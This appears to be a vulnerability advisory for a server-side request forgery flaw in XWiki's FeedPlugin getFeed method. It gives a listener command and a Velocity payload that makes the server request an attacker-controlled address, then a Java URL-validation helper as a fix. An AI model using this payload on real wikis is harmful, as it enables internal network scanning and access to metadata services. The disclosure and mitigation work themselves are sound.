Impact

The FeedPlugin is vulnerable to Server-Side Request Forgery (SSRF). The getFeed method accepts an arbitrary URL string and uses it to initiate an HTTP request without validating the destination against an allowlist or blocking internal network ranges. An attacker with Script Rights can use a Velocity script to force the XWiki server to scan internal network ports or access internal services (e.g., metadata services, localhost databases) that are not exposed to the internet.

Technical Analysis

Vulnerable Component: FeedPlugin (exposed via $xwiki.getPlugin("feed")).
Root Cause: The method getFeed(String url) opens a connection to the provided URL without sufficient validation.

Reproduction Steps & Proof of Concept
- Attacker Setup: The attacker starts an HTTP server to listen for incoming connections. Command: python3 -m http.server 4444
- Exploit Injection: Create or edit a Wiki page using the Wiki Editor (Source mode). Inject the following Velocity payload targeting the attacker's listener:
{{velocity}}
#set($feedPlugin = $xwiki.getPlugin("feed"))
#set($target = "http://172.19.0.1:4444/test-ssrf")
$feedPlugin.getFeed($target)
{{/velocity}}
- Execution: Save and view the page. This forces the XWiki backend to execute the Velocity script and process the getFeed request.
- Observation: The XWiki server (172.21.0.3) initiates an HTTP GET request to the attacker's machine (172.19.0.1).
Patches

The FeedPlugin should validate the target URL to ensure it does not resolve to internal IP addresses (localhost, private subnets) and strictly limit allowed protocols.
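An added example (not XWiki's own code) of the validation the patch calls for: a hypothetical FeedUrlPolicy helper that a getFeed implementation could call before opening the connection. It rejects anything but http/https and any host that resolves to a loopback, link-local, private or unique-local address.

```java
import java.net.InetAddress;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.UnknownHostException;

/** Hypothetical helper (not XWiki's own code): decides whether a feed URL may be fetched. */
public final class FeedUrlPolicy {
    /** True only if the scheme is http/https and every address the host resolves to is public. */
    public static boolean isAllowed(String url) {
        URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false;
        }
        String scheme = uri.getScheme() == null ? "" : uri.getScheme().toLowerCase();
        String host = uri.getHost();
        // Reject unsupported schemes, unparseable hosts and user:pass@host forms.
        if (host == null || uri.getUserInfo() != null
                || !(scheme.equals("http") || scheme.equals("https"))) {
            return false;
        }
        InetAddress[] addrs;
        try {
            addrs = InetAddress.getAllByName(host); // also accepts literal IPv4/IPv6 hosts
        } catch (UnknownHostException e) {
            return false;
        }
        // One internal record is enough to reject a name with mixed public/private answers.
        for (InetAddress a : addrs) {
            if (isInternal(a)) return false;
        }
        return true;
    }

    static boolean isInternal(InetAddress a) {
        return a.isAnyLocalAddress()      // 0.0.0.0, ::
            || a.isLoopbackAddress()      // 127.0.0.0/8, ::1
            || a.isLinkLocalAddress()     // 169.254.0.0/16 (cloud metadata), fe80::/10
            || a.isSiteLocalAddress()     // 10/8, 172.16/12, 192.168/16
            || a.isMulticastAddress()
            || isUniqueLocalV6(a);        // fc00::/7, which isSiteLocalAddress() does not cover
    }

    private static boolean isUniqueLocalV6(InetAddress a) {
        byte[] b = a.getAddress();
        return b.length == 16 && (b[0] & 0xFE) == 0xFC;
    }
}
```

Resolution here is separate from the fetch, so a DNS rebinding race remains unless the fetch connects to the vetted address; any redirect target needs the same check before it is followed.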